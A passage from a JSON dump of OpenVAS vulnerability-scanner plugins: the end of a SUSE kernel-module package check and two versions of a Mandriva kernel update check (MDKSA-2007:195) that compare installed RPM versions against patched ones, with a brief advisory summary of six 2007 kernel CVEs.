rpm:\"lirc-kmp-smp~0.8.0_2.6.16.53_0.8~0.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lirc-kmp-xenpae\", rpm:\"lirc-kmp-xenpae~0.8.0_2.6.16.53_0.8~0.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mkinitrd\", rpm:\"mkinitrd~1.2~106.58\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"multipath-tools\", rpm:\"multipath-tools~0.4.6~25.21\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ndiswrapper-kmp-bigsmp\", rpm:\"ndiswrapper-kmp-bigsmp~1.34_2.6.16.53_0.8~1.10\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ndiswrapper-kmp-debug\", rpm:\"ndiswrapper-kmp-debug~1.34_2.6.16.53_0.8~1.10\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ndiswrapper-kmp-default\", rpm:\"ndiswrapper-kmp-default~1.34_2.6.16.53_0.8~1.10\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ndiswrapper-kmp-smp\", rpm:\"ndiswrapper-kmp-smp~1.34_2.6.16.53_0.8~1.10\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ndiswrapper-kmp-xen\", rpm:\"ndiswrapper-kmp-xen~1.34_2.6.16.53_0.8~1.10\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ndiswrapper-kmp-xenpae\", rpm:\"ndiswrapper-kmp-xenpae~1.34_2.6.16.53_0.8~1.10\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"novfs-kmp-bigsmp\", rpm:\"novfs-kmp-bigsmp~2.0.0_2.6.16.53_0.8~3.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"novfs-kmp-debug\", rpm:\"novfs-kmp-debug~2.0.0_2.6.16.53_0.8~3.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"novfs-kmp-default\", rpm:\"novfs-kmp-default~2.0.0_2.6.16.53_0.8~3.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"novfs-kmp-smp\", rpm:\"novfs-kmp-smp~2.0.0_2.6.16.53_0.8~3.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"novfs-kmp-xen\", rpm:\"novfs-kmp-xen~2.0.0_2.6.16.53_0.8~3.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"novfs-kmp-xenpae\", rpm:\"novfs-kmp-xenpae~2.0.0_2.6.16.53_0.8~3.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kmp-bigsmp-20060126\", rpm:\"omnibook-kmp-bigsmp-20060126~2.6.16.53_0.8~0.5\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kmp-debug-20060126\", rpm:\"omnibook-kmp-debug-20060126~2.6.16.53_0.8~0.5\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kmp-default-20060126\", rpm:\"omnibook-kmp-default-20060126~2.6.16.53_0.8~0.5\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kmp-kdump-20060126\", rpm:\"omnibook-kmp-kdump-20060126~2.6.16.53_0.8~0.5\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kmp-smp-20060126\", rpm:\"omnibook-kmp-smp-20060126~2.6.16.53_0.8~0.5\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kmp-xen-20060126\", rpm:\"omnibook-kmp-xen-20060126~2.6.16.53_0.8~0.5\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kmp-xenpae-20060126\", rpm:\"omnibook-kmp-xenpae-20060126~2.6.16.53_0.8~0.5\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"open-iscsi\", rpm:\"open-iscsi~2.0.707~0.25\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openafs-kmp-xenpae\", rpm:\"openafs-kmp-xenpae~1.4.0_2.6.16.53_0.8~21.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pcfclock-kmp-bigsmp\", rpm:\"pcfclock-kmp-bigsmp~0.44_2.6.16.53_0.8~15.2\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pcfclock-kmp-debug\", rpm:\"pcfclock-kmp-debug~0.44_2.6.16.53_0.8~15.2\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pcfclock-kmp-default\", rpm:\"pcfclock-kmp-default~0.44_2.6.16.53_0.8~15.2\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pcfclock-kmp-smp\", rpm:\"pcfclock-kmp-smp~0.44_2.6.16.53_0.8~15.2\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"quickcam-kmp-default\", rpm:\"quickcam-kmp-default~0.6.3_2.6.16.53_0.8~0.1\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"smartlink-softmodem-kmp-bigsmp\", rpm:\"smartlink-softmodem-kmp-bigsmp~2.9.10_2.6.16.53_0.8~44.2\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"smartlink-softmodem-kmp-default\", rpm:\"smartlink-softmodem-kmp-default~2.9.10_2.6.16.53_0.8~44.2\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"smartlink-softmodem-kmp-smp\", rpm:\"smartlink-softmodem-kmp-smp~2.9.10_2.6.16.53_0.8~44.2\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tpctl-kmp-bigsmp\", rpm:\"tpctl-kmp-bigsmp~4.17_2.6.16.53_0.8~30.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tpctl-kmp-debug\", rpm:\"tpctl-kmp-debug~4.17_2.6.16.53_0.8~30.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tpctl-kmp-default\", rpm:\"tpctl-kmp-default~4.17_2.6.16.53_0.8~30.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tpctl-kmp-smp\", rpm:\"tpctl-kmp-smp~4.17_2.6.16.53_0.8~30.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"udev-085\", rpm:\"udev-085~30.40\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"usbvision-kmp-bigsmp\", rpm:\"usbvision-kmp-bigsmp~0.9.8.2_2.6.16.53_0.8~0.1\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"usbvision-kmp-debug\", rpm:\"usbvision-kmp-debug~0.9.8.2_2.6.16.53_0.8~0.1\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"usbvision-kmp-default\", rpm:\"usbvision-kmp-default~0.9.8.2_2.6.16.53_0.8~0.1\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"usbvision-kmp-smp\", rpm:\"usbvision-kmp-smp~0.9.8.2_2.6.16.53_0.8~0.1\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"usbvision-kmp-xen\", rpm:\"usbvision-kmp-xen~0.9.8.2_2.6.16.53_0.8~0.1\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"usbvision-kmp-xenpae\", rpm:\"usbvision-kmp-xenpae~0.9.8.2_2.6.16.53_0.8~0.1\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wlan-kmp-bigsmp-1\", rpm:\"wlan-kmp-bigsmp-1~2.6.16.53_0.8~0.7\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wlan-kmp-debug-1\", rpm:\"wlan-kmp-debug-1~2.6.16.53_0.8~0.7\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wlan-kmp-default-1\", rpm:\"wlan-kmp-default-1~2.6.16.53_0.8~0.7\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wlan-kmp-smp-1\", rpm:\"wlan-kmp-smp-1~2.6.16.53_0.8~0.7\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wlan-kmp-xen-1\", rpm:\"wlan-kmp-xen-1~2.6.16.53_0.8~0.7\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wlan-kmp-xenpae-1\", rpm:\"wlan-kmp-xenpae-1~2.6.16.53_0.8~0.7\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"zaptel-kmp-bigsmp\", rpm:\"zaptel-kmp-bigsmp~1.2.4_2.6.16.53_0.8~10.12\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"zaptel-kmp-debug\", rpm:\"zaptel-kmp-debug~1.2.4_2.6.16.53_0.8~10.12\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"zaptel-kmp-default\", rpm:\"zaptel-kmp-default~1.2.4_2.6.16.53_0.8~10.12\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"zaptel-kmp-smp\", rpm:\"zaptel-kmp-smp~1.2.4_2.6.16.53_0.8~10.12\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"zaptel-kmp-xen\", rpm:\"zaptel-kmp-xen~1.2.4_2.6.16.53_0.8~10.12\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"zaptel-kmp-xenpae\", rpm:\"zaptel-kmp-xenpae~1.2.4_2.6.16.53_0.8~10.12\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4573", "CVE-2007-3848", "CVE-2007-3105", "CVE-2007-3513", "CVE-2007-4308", "CVE-2007-3642"], "description": "Check for the Version of kernel", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:1361412562310830336", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830336", "type": "openvas", "title": "Mandriva Update for kernel MDKSA-2007:195 (kernel)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for kernel MDKSA-2007:195 (kernel)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Some vulnerabilities were discovered and corrected in the Linux\n 2.6 kernel:\n\n A stack-based buffer overflow in the random number generator could\n allow local root users to cause a denial of service or gain privileges\n by setting the default wakeup threshold to a value greater than the\n output pool size (CVE-2007-3105).\n \n The lcd_write function did not limit the amount of memory used by\n a caller, which allows local users to cause a denial of service\n (memory consumption) (CVE-2007-3513).\n \n The decode_choice function allowed remote attackers to cause a denial\n of service (crash) via an encoded out-of-range index value for a choice\n field which triggered a NULL pointer dereference (CVE-2007-3642).\n \n The Linux kernel allowed local users to send arbitrary signals\n to a child process that is running at higher privileges by\n causing a setuid-root parent process to die which delivered an\n attacker-controlled parent process death signal (PR_SET_PDEATHSIG)\n (CVE-2007-3848).\n \n The aac_cfg_openm and aac_compat_ioctl functions in the SCSI layer\n ioctl patch in aacraid did not check permissions for ioctls, which\n might allow local users to cause a denial of service or gain privileges\n (CVE-2007-4308).\n \n The IA32 system call emulation functionality, when running on the\n x86_64 architecture, did not zero extend the eax register after the\n 32bit entry path to ptrace is used, which could allow local users to\n gain privileges by triggering an out-of-bounds access to the system\n call table using the %RAX register (CVE-2007-4573).\n \n In addition to these security fixes, other fixes have been included\n such as:\n \n - More NVidia PCI ids wre added\n - The 3w-9xxx module was updated to version 2.26.02.010\n - Fixed the map entry for ICH8\n - Added the TG3 5786 PCI id\n - Reduced the log verbosity of cx88-mpeg\n \n To update your kernel, please follow the directions located at:\n \n http://www.mandriva.com/en/security/kernelupdate\";\n\ntag_affected = \"kernel on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64,\n Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-10/msg00008.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830336\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:57:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"MDKSA\", value: \"2007:195\");\n script_cve_id(\"CVE-2007-3105\", \"CVE-2007-3513\", \"CVE-2007-3642\", \"CVE-2007-3848\", \"CVE-2007-4308\", \"CVE-2007-4573\");\n script_name( \"Mandriva Update for kernel MDKSA-2007:195 (kernel)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc-latest\", rpm:\"kernel-doc-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-enterprise\", rpm:\"kernel-enterprise~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-enterprise-latest\", rpm:\"kernel-enterprise-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-latest\", rpm:\"kernel-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-legacy\", rpm:\"kernel-legacy~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-legacy-latest\", rpm:\"kernel-legacy-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-latest\", rpm:\"kernel-source-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-stripped\", rpm:\"kernel-source-stripped~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-stripped-latest\", rpm:\"kernel-source-stripped-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen0\", rpm:\"kernel-xen0~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen0-latest\", rpm:\"kernel-xen0-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-latest\", rpm:\"kernel-xenU-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-enterprise\", rpm:\"kernel-enterprise~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-legacy\", rpm:\"kernel-legacy~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-stripped\", rpm:\"kernel-source-stripped~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen0\", rpm:\"kernel-xen0~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.17.16mdv~1~1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4573", "CVE-2007-3848", "CVE-2007-3105", "CVE-2007-3513", "CVE-2007-4308", "CVE-2007-3642"], "description": "Check for the Version of kernel", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:830336", "href": "http://plugins.openvas.org/nasl.php?oid=830336", "type": "openvas", "title": "Mandriva Update for kernel MDKSA-2007:195 (kernel)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for kernel MDKSA-2007:195 (kernel)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Some vulnerabilities were discovered and corrected in the Linux\n 2.6 kernel:\n\n A stack-based buffer overflow in the random number generator could\n allow local root users to cause a denial of service or gain privileges\n by setting the default wakeup threshold to a value greater than the\n output pool size (CVE-2007-3105).\n \n The lcd_write function did not limit the amount of memory used by\n a caller, which allows local users to cause a denial of service\n (memory consumption) (CVE-2007-3513).\n \n The decode_choice function allowed remote attackers to cause a denial\n of service (crash) via an encoded out-of-range index value for a choice\n field which triggered a NULL pointer dereference (CVE-2007-3642).\n \n The Linux kernel allowed local users to send arbitrary signals\n to a child process that is running at higher privileges by\n causing a setuid-root parent process to die which delivered an\n attacker-controlled parent process death signal (PR_SET_PDEATHSIG)\n (CVE-2007-3848).\n \n The aac_cfg_openm and aac_compat_ioctl functions in the SCSI layer\n ioctl patch in aacraid did not check permissions for ioctls, which\n might allow local users to cause a denial of service or gain privileges\n (CVE-2007-4308).\n \n The IA32 system call emulation functionality, when running on the\n x86_64 architecture, did not zero extend the eax register after the\n 32bit entry path to ptrace is used, which could allow local users to\n gain privileges by triggering an out-of-bounds access to the system\n call table using the %RAX register (CVE-2007-4573).\n \n In addition to these security fixes, other fixes have been included\n such as:\n \n - More NVidia PCI ids wre added\n - The 3w-9xxx module was updated to version 2.26.02.010\n - Fixed the map entry for ICH8\n - Added the TG3 5786 PCI id\n - Reduced the log verbosity of cx88-mpeg\n \n To update your kernel, please follow the directions located at:\n \n http://www.mandriva.com/en/security/kernelupdate\";\n\ntag_affected = \"kernel on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64,\n Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-10/msg00008.php\");\n script_id(830336);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:57:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"MDKSA\", value: \"2007:195\");\n script_cve_id(\"CVE-2007-3105\", \"CVE-2007-3513\", \"CVE-2007-3642\", \"CVE-2007-3848\", \"CVE-2007-4308\", \"CVE-2007-4573\");\n script_name( \"Mandriva Update for kernel MDKSA-2007:195 (kernel)\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc-latest\", rpm:\"kernel-doc-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-enterprise\", rpm:\"kernel-enterprise~2.6.17.16mdv~1~1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-enterprise-latest\", rpm:\"kernel-enterprise-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-latest\", rpm:\"kernel-latest~2.6.17~16mdv\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-legacy\", 